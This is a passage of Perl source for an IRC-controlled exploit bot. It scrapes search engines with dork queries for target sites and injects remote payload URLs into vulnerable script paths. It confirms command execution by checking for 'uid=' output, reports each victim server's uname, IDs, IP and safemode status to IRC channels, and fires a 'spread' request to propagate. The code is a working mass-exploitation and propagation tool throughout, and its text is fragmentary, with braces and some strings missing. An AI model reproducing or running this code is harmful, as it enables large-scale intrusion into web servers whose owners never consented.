"PRIVMSG $channel :9,1ASK "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 9,1 pentru4,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :9,1ASK a terminat pentru4,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
my @fireball = fireball($dork);
push( my @tot, @fireball );
my @puliti = &unici(@tot);
display( $dsp,
"PRIVMSG $channel :9,1FIREBALL "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 19,1 pentru4,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :9,1FIREBALL a terminat pentru4,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
sub display() {
if ( $#_ == '1' ) {
my $dsp = $_[0];
print $dsp "$_[1]\n";
else {
print $dsp "$_[0]\n";
sub os() {
my $site = $_[0];
my $Res = query($site);
while ( $Res =~ m/<br>uname -a:(.+?)\<br>/g ) {
$un = $1;
while ( $Res =~ m/<br>uptime:(.+?)\<br>/g ) {
$up = $1;
while ( $Res =~ m/<br>id:(.+?)\<br>/g ) {
$id1 = $1;
while ( $Res =~ m/<br>pwd:(.+?)\<br>/g ) {
$pwd1 = $1;
while ( $Res =~ m/<br>php:(.+?)\<br>/g ) {
$php1 = $1;
while ( $Res =~ m/<br>software:(.+?)\<br>/g ) {
$sof1 = $1;
while ( $Res =~ m/<br>server-ip:(.+?)\<br>/g ) {
$ip1 = $1;
while ( $Res =~ m/<br>server-name:(.+?)\<br>/g ) {
$name1 = $1;
while ( $Res =~ m/<br>os:(.+?)\<br>/g ) {
$os = $1;
while ( $Res =~ m/<br>free:(.+?)\<br>/g ) {
$free = $1;
while ( $Res =~ m/<br>used:(.+?)\<br>/g ) {
$used = $1;
while ( $Res =~ m/<br>total:(.+?)\<br>/g ) {
$all = $1;
sub googlet {
my @dominios = (
"ae", "com.ar", "at", "com.au", "be", "com.br",
"ca", "ch", "cl", "de", "dk", "eu", "sa", "id", "tr", "pl", "uk", "gov", "my", "mx"
my @country =
( "AE", "AR", "AT", "AU", "BE", "BR", "CA", "CH", "CL", "DE", "DK" );
my @lst;
my $key = key( $_[0] );
my $c = 0;
foreach my $i (@dominios) {
my @lista = google( $i, $key, $country[$c] );
push( @lst, @lista );
return @lst;
sub google() {
my @lst;
my $i = $_[0];
my $key = $_[1];
my $country = $_[2];
for ( $b = 0 ; $b <= 100 ; $b += 100 ) {
my $Go =
( "www.google." . $i
. "/search?hl=en&q="
. key($key)
. "&num=100&start="
. $b
. "&meta=cr%3Dcountry"
. $country );
my $Res = query($Go);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /google/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub alltheweb() {
my @lst;
my $key = $_[0];
my $i = 0;
my $pg = 0;
for ( $i = 0 ; $i <= 1000 ; $i += 100 ) {
my $all =
( "http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q="
. key($key) . "&o="
. $i );
my $Res = query($all);
while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub altavista() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $AlT =
my $Res = query($AlT);
while ( $Res =~ m/<span class=ngrn>(.+?)\//g ) {
if ( $1 !~ /altavista/ ) {
my $k = $1;
$k =~ s/<//g;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
if ( $Res =~ /target=\"_self\">Succ/ ) { }
else { return @lst; }
return @lst;
sub uolsub() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $UoL =
( "http://busca.uol.com.br/www/index.html?q="
. key($key)
. "&start="
. $i );
my $Res = query($UoL);
while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
my $k = $1;
if ( $k !~ /busca|uol|yahoo/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub search() {
my $key = $_[0];
my $i = 1;
my $pg = 80;
my @lst;
my $av = 1;
while ( $i <= $pg ) {
my $search = "http://www.search.com/search?q=$key";
my $req = HTTP::Request->new( GET => $search );
my $ua = LWP::UserAgent->new();
$ua->agent('Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000');
my $response = $ua->request($req);
my $resp = $response->content;
while ( $resp =~ m/<a href=\"?http:\/\/(.+?)\//g ) {
if ( $1 !~ /msn|live|google|yahoo/ ) {
my $ok = "$1/";
push( @lst, $ok );
$av = $av + 10;
return @lst;
sub searchs() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 100 ; $b++ ) {
my $sc =
( "http://www.search.com/search?q=" . key($key) . "&nav=" . $b );
my $Res = query($sc);
while ( $Res =~ m/<a href=\"?http:\/\/(.+?)/g ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub msn() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $MsN =
( "http://search.live.com/results.aspx?q="
. key($key)
. "&first="
. $b
. "&FORM=PERE" );
my $Res = query($MsN);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /msn|live/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub ask() {
my @lst;
my $key = $_[0];
my $i = 0;
my $pg = 0;
for ( $i = 0 ; $i <= 1000 ; $i += 10 ) {
my $Ask =
( "http://it.ask.com/web?q="
. key($key)
. "&o=312&l=dir&qsrc=0&page="
. $i
. "&dm=all" );
my $Res = query($Ask);
while ( $Res =~
m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g )
my $k = $3;
$k =~ s/[\"\ ]//g;
my @grep = links($k);
push( @lst, @grep );
return @lst;
sub fireball() {
my $key = $_[0];
my $inizio = 1;
my $pagine = 200;
my @lst;
my $av = 0;
while ( $inizio <= $pagine ) {
my $fireball =
. key($key)
. "&cat=fb_loc&idx=all&enc=utf-8";
my $Res = query($fireball);
while ( $Res =~ m/<a href=\"?http:\/\/(.+?)\//g ) {
if ( $1 !~ /msn|live|google|yahoo/ ) {
my $k = "$1/";
my @grep = links($k);
push( @lst, @grep );
$av = $av + 10;
return @lst;
sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
sub geths() {
my $host = $_[0];
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
return $dork;
sub end() {
$string = $_[0];
$string .= "/";
$string =~ s/\/\//\//;
while ( $string =~ /\/\// ) {
$string =~ s/\/\//\//;
return ($string);
sub query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ( $query eq "" ) { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or return;
print $sock
"GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page = "@r";
return $page;
sub get_link() {
my $file_print = $_[1];
my $link = $_[0];
my $host = $_[0];
my $host_dir = $_[0];
my @links;
$host_dir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host_dir = &end($host_dir);
$host = &end($host);
$link = &end($host);
push( @links, $link, $host, $host_dir );
open( $file, '>>', $file_print );
print $file "$link\n$host_dir\n$host\n";
return @links;
sub unici {
my @unici = ();
my %visti = ();
foreach my $elemento (@_) {
$elemento =~ s/\/+/\//g;
next if $visti{$elemento}++;
push @unici, $elemento;
return @unici;